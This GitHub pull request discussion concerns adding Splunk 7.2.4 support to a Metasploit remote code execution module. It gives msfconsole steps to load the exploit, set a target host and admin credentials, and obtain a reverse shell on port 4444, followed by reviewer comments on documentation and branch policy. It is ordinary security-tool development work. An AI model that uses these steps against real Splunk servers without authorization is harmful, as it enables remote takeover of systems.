Add support for splunk 7.2.4 to 'Splunk Custom App Remote Code Execution'

[uf0o]

Hi
I have been working on integrating some changes to the 'Splunk Custom App Remote Code Execution' and including support for splunk 7.2.4 (it might even work on the whole 7 train up to 7.2.4)

Verification steps

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/multi/http/splunk_upload_app_exec
• set required variables (you will need admin credentials)
  SET TARGET 1
SET RHOST 192.168.1.1
SET USERNAME admin
SET PASSWORD changeme
• 'run' or 'exploit' and you should expect reverse shell connection on port 4444

It has been tested successfully on both linux,macos (windows does not support python reverse shell but all the other available commands are working as expected)

[h00die]

it looks like we don't have any docs for this module. Excellent opportunity to make some!

Would you mind adding? Template is here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

[uf0o]

I have also included the documentation section as well

[Green-m]

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

[bcoles]

#11579